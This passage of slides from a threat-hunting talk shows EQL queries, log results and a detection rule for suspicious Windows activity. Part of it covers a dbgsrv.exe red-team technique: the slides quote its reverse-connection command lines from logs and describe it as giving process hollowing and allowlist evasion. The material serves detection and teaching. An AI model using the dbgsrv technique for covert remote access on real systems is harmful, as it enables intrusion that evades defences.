process where subtype.create
and process_name == "powershell.exe"
and command_line == "* *"
| unique_count command_line
3 unique results found
57. What files were created by non-SYSTEM users but later executed as SYSTEM?
integritas campester
sequence
[file where subtype.create
and event of [process where subtype.create and
user_name != "SYSTEM"]] by file_path
[process where subtype.create and
user_name == "SYSTEM"] by process_path
0 results found
58. network where subtype.outgoing
| unique process_path
| tail 15
What processes recently made their first network connection?
novum nexumus
15 results found
63. novum nexumus
destination port process_path user_name
10.10.10.10 8443 C:WindowsMicrosoft.NETFrameworkv4.0.30319
InstallUtil.exe
NewtScamander
10.10.10.129 22 C:Program FilesDebugging Tools for Windows (x64)dbgsrv.exe NewtScamander
10.10.10.10 8443 C:WindowsSystem32notepad.exe NewtScamander
64. novum nexumus
destination port process_path user_name
10.10.10.10 8443 C:WindowsMicrosoft.NETFrameworkv4.0.30319
InstallUtil.exe
NewtScamander
10.10.10.129 22 C:Program FilesDebugging Tools for Windows (x64)dbgsrv.exe NewtScamander
10.10.10.10 8443 C:WindowsSystem32notepad.exe NewtScamander
✘ Red
Team
65. novum nexumus
destination port process_path user_name
10.10.10.10 8443 C:WindowsMicrosoft.NETFrameworkv4.0.30319
InstallUtil.exe
NewtScamander
10.10.10.129 22 C:Program FilesDebugging Tools for Windows (x64)dbgsrv.exe NewtScamander
10.10.10.10 8443 C:WindowsSystem32notepad.exe NewtScamander
✘ Red
Team
67. nota vocatio
Why is notepad.exe making outbound network connections?
sequence by unique_pid
[process where process_name == "notepad.exe"]
[network where subtype.outgoing]
process_name event_type subtype parent_process_path destination
notepad.exe process create C:Program FilesDebugging Tools
for Windows (x64)dbgsrv.exe
notepad.exe network outgoing 10.10.10.10
notepad.exe process create C:Program FilesDebugging Tools
for Windows (x64)dbgsrv.exe
notepad.exe network outgoing 10.10.10.10
68. nota vocatio
What else did dbgsrv.exe do?
any where event_type in ("process", "network",
"file", "registry")
and process_name == "dbgsrv.exe"
| unique unique_pid, event_type, subtype
7 results found
69. pid event_type subtype parent_process_name command_line destination
7268 process create explorer.exe "C:Program FilesDebugging Tools for Windows (x64)dbgsrv.exe"
-t tcp:clicon=10.10.10.129,port=22
7268 network outgoing 10.10.10.129
7268 process terminate
4956 process create explorer.exe "C:Program FilesDebugging Tools for Windows (x64)dbgsrv.exe
-t tcp:clicon=remotedebug.msdn.azure.com,port=22
8044 process create explorer.exe "C:Program FilesDebugging Tools for Windows (x64)dbgsrv.exe"
-t tcp:clicon=remotedebug.msdn.azure.com,port=22
2680 process create explorer.exe "C:Program FilesDebugging Tools for Windows (x64)dbgsrv.exe"
-t tcp:clicon=remotedebug.msdn.azure.com,port=22
2680 network outgoing 10.10.10.129
nota vocatio
What else did dbgsrv.exe do?
70. destination port process_path user_name
10.10.10.129 22 C:Program FilesDebugging Tools for Windows (x64)dbgsrv.exe NewtScamander
10.10.10.10 8443 C:WindowsSystem32notepad.exe NewtScamander
novum nexumus
✘ New
technique?
71.
72. DBGSRV: A Fantastic Red-Team Attack
Think of this tool as giving you what is functionally equivalent to
● Reverse TCP Connection
● Process Hollowing
● Whitelist Evasion
Disclosed to MSRC, cleared for disclosure.
- It is a binary working as designed. It is not an exploit.
76. DBGSRV: Detection
ATT&CK T1127: Trusted Developer Utilities
sequence
[process where subtype.create and
(process_name == "dbgsrv.exe" or
original_file_name == "dbgsrv.exe")
] by unique_pid
[network where subtype.outgoing] by unique_pid
[process where subtype.create] by unique_ppid
78. EQL Analytics Library
● Library of 100+ detections written in EQL
● Mapped to ATT&CK tactics and techniques
○ Automatically updated coverage
● Abstracted from specific data sources
○ Provide a mapping to your fields
○ Sysmon already implemented
eqllib.readthedocs.io
79. EQL Analytics Library
[analytic.metadata]
categories = ["detect"]
confidence = "medium"
contributors = ["Endgame"]
created_date = "08/08/2019"
description = "Detect dbgsrv.exe used to
launch remote debuggers as a potential
remote access tool"
id = "70814733-e756-4eda-8840-5e16c49304f6"
name = "DbgSrv Remote Debugger"
os = ["windows"]
tactics = ["Execution"]
techniques = ["T1127"]
updated_date = "08/08/2019"
[analytic]
query = '''
sequence
[process where subtype.create and
(process_name == "dbgsrv.exe" or
original_file_name == "dbgsrv.exe")]
by unique_pid
[network where subtype.outgoing]
by unique_pid
[process where subtype.create]
by unique_ppid
'''
80. Survey Says
====================================================================
count analytic_name
====================================================================
1 Installation of Browser Extensions
1 Process Discovery
1 RegSvr32 Scriptlet Execution
1 Suspicious Script Object Execution
1 System Owner and User Discovery
2 Creation of Scheduled Task
2 Network Service Scanning via Port Scanning
2 Windows Discovery of Network Environment via Built-in Tools
3 Execution of Existing Service via Command
3 InstallUtil Process
6 Control Panel Items
6 Indicator Removal on Host
6 Stop Services with sc.exe
12 Windows System Information Discovery
$ eqllib survey -f mydata.json.gz -c
81. Identifying True Positives
● Build a baseline of your environment
● What do you find multiple times?
○ Track repeat offenders
○ Both installutil.exe and dbgsrv.exe
triggered multiple detections
Does it tell a story?
82. Pitfalls of Behavioral Detection
● False positives from administrators and background software
○ Watch your ratio of false to true positives
● Lack of context to improve detections
○ True positives rarely occur in isolation
● Waiting for a red team to test posture
● Knee-jerk reactions to trending malware
84. Install and configure Microsoft Sysmon on a Windows endpoint
Detonate an Atomic Test to generate events
Collect events as a JSON file using PowerShell
Install Python then download EQL
pip install eql
Load the EQL shell with the command
eql
Load your data file within the shell
input -f my_sysmon_logs.json
DIY Red & Blue team
85. Conclusion
● Understand what data sources you have
● Focus on commonly seen behaviors
● Practice on small known sets then scale up
● Test early, test often
● Know your resources
● Share with the community!
86. Resources
● MITRE ATT&CK
attack.mitre.org
● Atomic Red Team
atomicredteam.io
● Event Query Language
eql.readthedocs.io
● EQL Analytics Library
eqllib.readthedocs.io
bit.ly/fantastic19
87. Thank You
A number of people helped us along the way.
Paul Ewing
Devon Kerr
Mike Haag
Adam Shostack - BlackHat Speaker Coach